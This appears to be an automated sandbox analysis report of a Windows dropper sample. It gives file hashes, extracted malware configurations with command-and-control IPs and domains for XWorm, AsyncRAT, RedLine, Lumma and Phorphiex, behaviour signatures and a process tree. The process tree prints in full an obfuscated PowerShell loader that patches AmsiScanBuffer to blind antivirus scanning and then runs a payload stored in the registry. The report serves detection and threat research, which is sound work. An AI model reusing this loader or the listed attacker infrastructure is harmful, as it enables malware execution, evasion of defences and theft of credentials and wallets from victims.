Resubmissions

28-11-2024 00:45

241128-a4gw8atpak 10

28-11-2024 00:41

241128-a17ngatncn 10

Analysis

  • max time kernel
    452s
  • max time network
    505s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    28-11-2024 00:45

Errors

Reason
Machine shutdown

General

  • Target

    4363463463464363463463463.exe

  • Size

    10KB

  • MD5

    2a94f3960c58c6e70826495f76d00b85

  • SHA1

    e2a1a5641295f5ebf01a37ac1c170ac0814bb71a

  • SHA256

    2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

  • SHA512

    fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f

  • SSDEEP

    192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Malware Config

Extracted

Family

xworm

Version

5.0

C2

104.219.239.11:6969

Mutex

7UYGUkFPl0vXivrC

Attributes
  • Install_directory

    %AppData%

  • install_file

    OneDrive.exe

aes.plain

Extracted

Family

phorphiex

C2

http://185.215.113.84

Extracted

Family

redline

C2

38.180.109.140:20007

Extracted

Family

asyncrat

Version

Shadow X RAT & HVNC 1.0.0

Botnet

reWASD

C2

sayo0w.duckdns.org:7173

Mutex

2318923179jj27139792813j721983j7213987j98213j97823j789213j978213j978j12391239j913278321

Attributes
  • delay

    1

  • install

    true

  • install_file

    svchost.exe

  • install_folder

    C:\WIndows

aes.plain

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

85.198.108.36:7667

Mutex

egghlcckqridunl

Attributes
  • delay

    6

  • install

    false

  • install_folder

    %Temp%

aes.plain

Extracted

Family

redline

Botnet

Diamotrix

C2

176.111.174.140:1912

Extracted

Family

lumma

C2

https://scriptyprefej.store

https://navygenerayk.store

https://founpiuer.store

https://necklacedmny.store

https://thumbystriw.store

https://fadehairucw.store

https://crisiwarny.store

https://presticitpo.store

https://preside-comforter.sbs

https://savvy-steereo.sbs

https://copper-replace.sbs

https://record-envyp.sbs

https://slam-whipp.sbs

https://wrench-creter.sbs

https://looky-marked.sbs

https://plastic-mitten.sbs

https://hallowed-noisy.sbs

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Detect Xworm Payload 3 IoCs
  • Detects ZharkBot payload 1 IoCs

    ZharkBot is a botnet written C++.

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

  • Lokibot family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Njrat family
  • Phorphiex family
  • Phorphiex payload 1 IoCs
  • Phorphiex, Phorpiex

    Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 5 IoCs
  • Redline family
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Stormkitty family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 16 IoCs
  • UAC bypass 3 TTPs 3 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • ZharkBot

    ZharkBot is a botnet written C++.

  • Zharkbot family
  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Async RAT payload 2 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Stops running service(s) 4 TTPs
  • A potential corporate email address has been identified in the URL: abistal_640.gif@webp
  • A potential corporate email address has been identified in the URL: anna_is_back_640.gif@webp
  • A potential corporate email address has been identified in the URL: bellaanderson_640.gif@webp
  • A potential corporate email address has been identified in the URL: bonnbonnet_640.gif@webp
  • A potential corporate email address has been identified in the URL: britanyroa_640.gif@webp
  • A potential corporate email address has been identified in the URL: ciararose_640.gif@webp
  • A potential corporate email address has been identified in the URL: cum_inmyass_640.gif@webp
  • A potential corporate email address has been identified in the URL: danamorgan_640.gif@webp
  • A potential corporate email address has been identified in the URL: deliciousdeea_640.gif@webp
  • A potential corporate email address has been identified in the URL: emamonroe_640.gif@webp
  • A potential corporate email address has been identified in the URL: emma_shy_640.gif@webp
  • A potential corporate email address has been identified in the URL: giannacoll_640.gif@webp
  • A potential corporate email address has been identified in the URL: good_girl_kate_640.gif@webp
  • A potential corporate email address has been identified in the URL: grettabrown_640.gif@webp
  • A potential corporate email address has been identified in the URL: hilaryrhodes_640.gif@webp
  • A potential corporate email address has been identified in the URL: [email protected]
  • A potential corporate email address has been identified in the URL: honmary_640.gif@webp
  • A potential corporate email address has been identified in the URL: isabelacarter_640.gif@webp
  • A potential corporate email address has been identified in the URL: isabellaeva_640.gif@webp
  • A potential corporate email address has been identified in the URL: janetstone_640.gif@webp
  • A potential corporate email address has been identified in the URL: julietawolff_640.gif@webp
  • A potential corporate email address has been identified in the URL: karlarati_640.gif@webp
  • A potential corporate email address has been identified in the URL: kendallsmiith_640.gif@webp
  • A potential corporate email address has been identified in the URL: kendhalllee_640.gif@webp
  • A potential corporate email address has been identified in the URL: khlo_velbet_640.gif@webp
  • A potential corporate email address has been identified in the URL: lauranoa_640.gif@webp
  • A potential corporate email address has been identified in the URL: lexykeen_640.gif@webp
  • A potential corporate email address has been identified in the URL: liacathaleya_640.gif@webp
  • A potential corporate email address has been identified in the URL: liliyamoon_640.gif@webp
  • A potential corporate email address has been identified in the URL: lilly_tyler_640.gif@webp
  • A potential corporate email address has been identified in the URL: louisechane_640.gif@webp
  • A potential corporate email address has been identified in the URL: luck4u_640.gif@webp
  • A potential corporate email address has been identified in the URL: margaritakis_640.gif@webp
  • A potential corporate email address has been identified in the URL: mianeilld_640.gif@webp
  • A potential corporate email address has been identified in the URL: miragrace_640.gif@webp
  • A potential corporate email address has been identified in the URL: mssweet_640.gif@webp
  • A potential corporate email address has been identified in the URL: raiissalambert_640.gif@webp
  • A potential corporate email address has been identified in the URL: ranyah_640.gif@webp
  • A potential corporate email address has been identified in the URL: samimiller_640.gif@webp
  • A potential corporate email address has been identified in the URL: sarad_640.gif@webp
  • A potential corporate email address has been identified in the URL: scarletferer_640.gif@webp
  • A potential corporate email address has been identified in the URL: serenamoll_640.gif@webp
  • A potential corporate email address has been identified in the URL: tamarafuentes_640.gif@webp
  • A potential corporate email address has been identified in the URL: tammy_ashley_640.gif@webp
  • A potential corporate email address has been identified in the URL: tiffanycardi_640.gif@webp
  • A potential corporate email address has been identified in the URL: tinnyfoxxy_640.gif@webp
  • A potential corporate email address has been identified in the URL: vanessaxxx_640.gif@webp
  • A potential corporate email address has been identified in the URL: victoriafoxs_640.gif@webp
  • A potential corporate email address has been identified in the URL: violetgiles_640.gif@webp
  • A potential corporate email address has been identified in the URL: yviesweet_640.gif@webp
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 64 IoCs
  • Identifies Wine through registry keys 2 TTPs 1 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 4 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Power Settings 1 TTPs 4 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 13 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 5 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 8 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 48 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • System Time Discovery 1 TTPs 1 IoCs

    Adversary may gather the system time and/or time zone settings from a local or remote system.

  • NSIS installer 2 IoCs
  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 58 IoCs
  • Modifies registry class 37 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:636
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:536
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{d0090ce5-f183-4dfa-97c3-afcbda887ee3}
          2⤵
            PID:5892
          • C:\Windows\system32\LogonUI.exe
            "LogonUI.exe" /flags:0x4 /state0:0xa3940055 /state1:0x41c64e6d
            2⤵
              PID:4124
          • C:\Windows\system32\lsass.exe
            C:\Windows\system32\lsass.exe
            1⤵
              PID:696
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
              1⤵
                PID:1008
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                1⤵
                  PID:720
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                  1⤵
                    PID:1084
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                    1⤵
                      PID:1092
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                      1⤵
                        PID:1208
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                        1⤵
                          PID:1248
                          • C:\Users\Admin\AppData\Roaming\OneDrive.exe
                            C:\Users\Admin\AppData\Roaming\OneDrive.exe
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3640
                          • C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
                            "C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
                            2⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • Suspicious behavior: EnumeratesProcesses
                            PID:4412
                          • C:\Users\Admin\AppData\Roaming\OneDrive.exe
                            C:\Users\Admin\AppData\Roaming\OneDrive.exe
                            2⤵
                            • Executes dropped EXE
                            PID:5052
                          • C:\Users\Admin\AppData\Roaming\OneDrive.exe
                            C:\Users\Admin\AppData\Roaming\OneDrive.exe
                            2⤵
                            • Executes dropped EXE
                            PID:4532
                          • C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                            C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                            2⤵
                            • Executes dropped EXE
                            PID:5156
                          • C:\Users\Admin\AppData\Roaming\OneDrive.exe
                            C:\Users\Admin\AppData\Roaming\OneDrive.exe
                            2⤵
                            • Executes dropped EXE
                            PID:5988
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:nzmkXGPTzWRj{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$fHSXJWpbgBwerD,[Parameter(Position=1)][Type]$jMqinvyapW)$QLDrAVnbSOp=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+'e'+'cte'+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+'a'+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+'e'+''+[Char](109)+'ory'+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType('M'+[Char](121)+''+'D'+''+'e'+''+[Char](108)+''+'e'+''+[Char](103)+''+'a'+'t'+[Char](101)+''+[Char](84)+''+'y'+'p'+[Char](101)+'',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+',Pub'+'l'+''+'i'+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+','+'A'+''+[Char](110)+''+'s'+''+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+'o'+[Char](67)+'l'+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$QLDrAVnbSOp.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+'a'+''+[Char](108)+'Nam'+[Char](101)+''+','+''+'H'+''+[Char](105)+''+'d'+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+'g'+[Char](44)+'Pu'+[Char](98)+''+[Char](108)+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$fHSXJWpbgBwerD).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+'M'+'a'+''+'n'+''+'a'+''+'g'+''+[Char](101)+'d');$QLDrAVnbSOp.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+'o'+[Char](107)+''+'e'+'','P'+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+'c'+','+[Char](72)+''+[Char](105)+'de'+[Char](66)+''+[Char](121)+'S'+'i'+''+[Char](103)+''+','+''+[Char](78)+'e'+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+'u'+'a'+''+'l'+'',$jMqinvyapW,$fHSXJWpbgBwerD).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+'e'+''+'d'+'');Write-Output $QLDrAVnbSOp.CreateType();}$fpnncAwptbASn=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+'r'+'o'+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+'n'+''+'3'+''+'2'+''+'.'+''+'U'+'ns'+[Char](97)+'f'+[Char](101)+''+'N'+''+[Char](97)+''+'t'+''+[Char](105)+''+[Char](118)+''+'e'+'Me'+[Char](116)+''+'h'+'o'+[Char](100)+'s');$wHDgSzTmXwxYYY=$fpnncAwptbASn.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+'P'+''+[Char](114)+''+[Char](111)+''+'c'+''+'A'+''+'d'+''+[Char](100)+''+[Char](114)+'es'+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+','+[Char](83)+''+'t'+''+[Char](97)+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$breipgLMhFtgFPEvvQy=nzmkXGPTzWRj @([String])([IntPtr]);$LxvPBQznoXNijSpxxAtPgV=nzmkXGPTzWRj @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$DjNLBPoffey=$fpnncAwptbASn.GetMethod(''+'G'+''+[Char](101)+''+'t'+'M'+'o'+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+''+[Char](72)+''+'a'+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+'e'+[Char](114)+''+'n'+''+[Char](101)+''+'l'+''+'3'+''+'2'+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')));$oIkOXeqKwllAcQ=$wHDgSzTmXwxYYY.Invoke($Null,@([Object]$DjNLBPoffey,[Object](''+[Char](76)+'oa'+'d'+'L'+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+'r'+'y'+'A'+'')));$LBznHbLgsiADMnPyw=$wHDgSzTmXwxYYY.Invoke($Null,@([Object]$DjNLBPoffey,[Object]('V'+[Char](105)+'r'+'t'+''+[Char](117)+'a'+[Char](108)+'P'+[Char](114)+''+'o'+''+'t'+''+'e'+'ct')));$qSsKgCu=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oIkOXeqKwllAcQ,$breipgLMhFtgFPEvvQy).Invoke('am'+'s'+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$KyyDDYbxsrJEJTObh=$wHDgSzTmXwxYYY.Invoke($Null,@([Object]$qSsKgCu,[Object]('Am'+'s'+'i'+'S'+''+'c'+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+'f'+'f'+''+[Char](101)+''+'r'+'')));$IDZzQRkZvO=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LBznHbLgsiADMnPyw,$LxvPBQznoXNijSpxxAtPgV).Invoke($KyyDDYbxsrJEJTObh,[uint32]8,4,[ref]$IDZzQRkZvO);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$KyyDDYbxsrJEJTObh,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LBznHbLgsiADMnPyw,$LxvPBQznoXNijSpxxAtPgV).Invoke($KyyDDYbxsrJEJTObh,[uint32]8,0x20,[ref]$IDZzQRkZvO);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+''+[Char](70)+'T'+'W'+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue('d'+'i'+''+[Char](97)+'l'+[Char](101)+''+[Char](114)+''+[Char](115)+''+[Char](116)+''+'a'+'g'+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
                            2⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • Command and Scripting Interpreter: PowerShell
                            • Drops file in System32 directory
                            • Suspicious use of SetThreadContext
                            • Modifies data under HKEY_USERS
                            PID:5356
                          • C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                            C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                            2⤵
                              PID:5940
                            • C:\Users\Admin\AppData\Roaming\OneDrive.exe
                              C:\Users\Admin\AppData\Roaming\OneDrive.exe
                              2⤵
                                PID:7008
                              • C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                2⤵
                                  PID:7000
                                • C:\Users\Admin\AppData\Roaming\OneDrive.exe
                                  C:\Users\Admin\AppData\Roaming\OneDrive.exe
                                  2⤵
                                    PID:4336
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
                                  1⤵
                                    PID:1292
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                    1⤵
                                      PID:1340
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                      1⤵
                                        PID:1384
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                        1⤵
                                          PID:1500
                                          • C:\Windows\system32\sihost.exe
                                            sihost.exe
                                            2⤵
                                              PID:2576
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                            1⤵
                                              PID:1576
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                              1⤵
                                                PID:1628
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                1⤵
                                                  PID:1640
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k NetworkService -p
                                                  1⤵
                                                    PID:1688
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                    1⤵
                                                      PID:1744
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                      1⤵
                                                        PID:1816
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                        1⤵
                                                          PID:1836
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                          1⤵
                                                            PID:1964
                                                            • C:\Windows\system32\AUDIODG.EXE
                                                              C:\Windows\system32\AUDIODG.EXE 0x00000000000004D4 0x00000000000004DC
                                                              2⤵
                                                                PID:6368
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                              1⤵
                                                                PID:2020
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                1⤵
                                                                  PID:2028
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                                  1⤵
                                                                    PID:2008
                                                                  • C:\Windows\System32\svchost.exe
                                                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                    1⤵
                                                                      PID:2096
                                                                    • C:\Windows\System32\spoolsv.exe
                                                                      C:\Windows\System32\spoolsv.exe
                                                                      1⤵
                                                                      • Modifies data under HKEY_USERS
                                                                      PID:2140
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                      1⤵
                                                                        PID:2308
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                        1⤵
                                                                          PID:2328
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                          1⤵
                                                                            PID:2600
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                            1⤵
                                                                              PID:2608
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                              1⤵
                                                                                PID:2616
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k NetworkService -p
                                                                                1⤵
                                                                                  PID:2648
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                                  1⤵
                                                                                    PID:2748
                                                                                  • C:\Windows\sysmon.exe
                                                                                    C:\Windows\sysmon.exe
                                                                                    1⤵
                                                                                      PID:2768
                                                                                    • C:\Windows\System32\svchost.exe
                                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                                      1⤵
                                                                                        PID:2784
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                                        1⤵
                                                                                          PID:2792
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                          1⤵
                                                                                            PID:2816
                                                                                          • C:\Windows\system32\wbem\unsecapp.exe
                                                                                            C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                            1⤵
                                                                                              PID:3144
                                                                                            • C:\Windows\Explorer.EXE
                                                                                              C:\Windows\Explorer.EXE
                                                                                              1⤵
                                                                                              • Modifies registry class
                                                                                              PID:3240
                                                                                              • C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
                                                                                                2⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:4988
                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  3⤵
                                                                                                    PID:4784
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Files\RedSystem.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Files\RedSystem.exe"
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    PID:432
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 1308
                                                                                                      4⤵
                                                                                                      • Program crash
                                                                                                      PID:4848
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 1408
                                                                                                      4⤵
                                                                                                      • Program crash
                                                                                                      PID:4104
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Files\test_again2.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Files\test_again2.exe"
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:2876
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Files\svhosts.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Files\svhosts.exe"
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:664
                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                      4⤵
